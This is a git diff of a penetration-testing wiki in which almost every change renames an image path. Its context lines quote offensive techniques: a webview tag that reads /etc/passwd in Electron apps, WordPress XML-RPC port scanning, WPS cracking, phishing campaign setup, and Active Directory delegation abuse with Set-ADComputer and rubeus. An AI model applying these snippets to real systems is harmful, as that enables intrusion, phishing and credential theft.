|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png)
|
||||
|
||||
You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
|
||||
|
||||
|
@ -195,7 +195,7 @@ Or even **relations of several different objects using aliases**:
|
|||
|
||||
In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case):
|
||||
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-26-27.png>)
|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png)
|
||||
|
||||
For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**.
|
||||
|
||||
|
@ -255,7 +255,7 @@ Below you can find the simplest demonstration of an application authentication r
|
|||
|
||||
As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
|
||||
|
||||
![](<../../.gitbook/assets/image (119) (2).png>)
|
||||
![](<../../.gitbook/assets/image (119) (1).png>)
|
||||
|
||||
## CSRF in GraphQL
|
||||
|
||||
|
|
|
@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml
|
|||
|
||||
If you see an error like the following one:
|
||||
|
||||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2).png>)
|
||||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1).png>)
|
||||
|
||||
It means that the server **didn't receive the correct domain name** inside the Host header.\
|
||||
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
|
||||
|
|
|
@ -161,7 +161,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one *
|
|||
</methodCall>
|
||||
```
|
||||
|
||||
![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png)
|
||||
![](../../.gitbook/assets/1\_jauyizf8zjdggb7ocszc-g.png)
|
||||
|
||||
If you get **faultCode** with a value **greater** then **0** (17), it means the port is open.
|
||||
|
||||
|
@ -187,7 +187,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
|
|||
</methodCall>
|
||||
```
|
||||
|
||||
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (102).png>)
|
||||
|
||||
|
|
|
@ -122,7 +122,7 @@ There are 2 places where built-int methods can be overwritten: In preload code o
|
|||
|
||||
If `contextIsolation` set to false you can try to use \<webview> (similar to \<iframe> butcan load local files) to read local files and exfiltrate them: using something like **\<webview src=”file:///etc/passwd”>\</webview>:**
|
||||
|
||||
![](../../../.gitbook/assets/1-u1jdryuwaevwjmf\_f2ttjg.png)
|
||||
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf\_F2ttJg.png>)
|
||||
|
||||
## **XSS Phishing via Internal URL regex bypass**
|
||||
|
||||
|
|
|
@ -264,7 +264,7 @@ Some really bad implementations allowed the Null PIN to connect (very weird also
|
|||
|
||||
All the proposed WPS attacks can be easily performed using _**airgeddon.**_
|
||||
|
||||
![](<../../.gitbook/assets/image (201) (1).png>)
|
||||
![](<../../.gitbook/assets/image (124).png>)
|
||||
|
||||
* 5 and 6 lets you try **your custom PIN** (if you have any)
|
||||
* 7 and 8 perform the **Pixie Dust attack**
|
||||
|
@ -352,7 +352,7 @@ _Note that as the client was deauthenticated it could try to connect to a differ
|
|||
|
||||
Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening:
|
||||
|
||||
![](<../../.gitbook/assets/image (172) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (172) (1).png>)
|
||||
|
||||
Once the handshake is captured you can **crack** it with `aircrack-ng`:
|
||||
|
||||
|
|
|
@ -339,7 +339,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
|
|||
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
|
||||
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
|
||||
|
||||
![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (7).png>)
|
||||
![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (7).png>)
|
||||
|
||||
{% hint style="info" %}
|
||||
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\
|
||||
|
@ -380,7 +380,7 @@ Note that **in order to increase the credibility of the email**, it's recommende
|
|||
* Search for **public emails** like info@ex.com or press@ex.com or public@ex.com and send them an email and wait for the response.
|
||||
* Try to contact **some valid discovered** email and wait for the response
|
||||
|
||||
![](<../.gitbook/assets/image (393).png>)
|
||||
![](<../.gitbook/assets/image (67) (1).png>)
|
||||
|
||||
{% hint style="info" %}
|
||||
The Email Template also allows to **attach files to send**. If you would also like to steal NTLM challenges using some specially crafted files/documents [read this page](../windows/ntlm/places-to-steal-ntlm-creds.md).
|
||||
|
|
|
@ -10,7 +10,7 @@ If you ends in a code **using shift rights and lefts, xors and several arithmeti
|
|||
|
||||
If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
|
||||
|
||||
![](<../../.gitbook/assets/image (375) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (254) (1).png>)
|
||||
|
||||
Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
|
||||
|
||||
|
@ -145,7 +145,7 @@ You can identify both of them checking the constants. Note that the sha\_init ha
|
|||
|
||||
Note the use of more constants
|
||||
|
||||
![](<../../.gitbook/assets/image (253) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (253) (1) (1).png>)
|
||||
|
||||
## CRC (hash)
|
||||
|
||||
|
@ -173,7 +173,7 @@ A CRC hash algorithm looks like:
|
|||
|
||||
The graph is quiet large:
|
||||
|
||||
![](<../../.gitbook/assets/image (207) (2) (1).png>)
|
||||
![](<../../.gitbook/assets/image (207) (2).png>)
|
||||
|
||||
Check **3 comparisons to recognise it**:
|
||||
|
||||
|
|
|
@ -55,7 +55,7 @@ DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
|
|||
|
||||
And click on **compile**:
|
||||
|
||||
![](<../../.gitbook/assets/image (314) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (314) (1).png>)
|
||||
|
||||
Then save the new file on _**File >> Save module...**_:
|
||||
|
||||
|
|
|
@ -10,7 +10,7 @@ Active Directory objects such as users and groups are securable objects and DACL
|
|||
|
||||
An example of ACEs for the "Domain Admins" securable object can be seen here:
|
||||
|
||||
![](../../.gitbook/assets/1.png)
|
||||
![](<../../.gitbook/assets/1 (1).png>)
|
||||
|
||||
Some of the Active Directory object permissions and types that we as attackers are interested in:
|
||||
|
||||
|
|
|
@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha
|
|||
|
||||
Note the spotless' user membership:
|
||||
|
||||
![](<../../.gitbook/assets/1 (2) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/1 (2) (1).png>)
|
||||
|
||||
However, we can still add new users:
|
||||
|
||||
|
|
|
@ -61,7 +61,7 @@ Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTE
|
|||
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked
|
||||
```
|
||||
|
||||
![](../../.gitbook/assets/B2.png)
|
||||
![](../../.gitbook/assets/b2.png)
|
||||
|
||||
#### Using powerview
|
||||
|
||||
|
@ -105,7 +105,7 @@ rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:admin
|
|||
Note that users has an attribute called "**Cannot be delegated**". If a user has this attribute to True, you won't be able to impersonate him . This property can be seen inside bloodhound.
|
||||
{% endhint %}
|
||||
|
||||
![](../../.gitbook/assets/B3.png)
|
||||
![](../../.gitbook/assets/b3.png)
|
||||
|
||||
### Accessing
|
||||
|
||||
|
|
|
@ -57,7 +57,7 @@ Using _Restricted Admin mode for RDP_, when you connect to a remote computer usi
|
|||
|
||||
Note that as your credentials are not being saved on the RDP session if **try to access network resources** your credentials won't be used. **The machine identity will be used instead**.
|
||||
|
||||
![](../../.gitbook/assets/ram.png)
|
||||
![](../../.gitbook/assets/RAM.png)
|
||||
|
||||
From [here](https://blog.ahasayen.com/restricted-admin-mode-for-rdp/).
|
||||
|
||||
|
|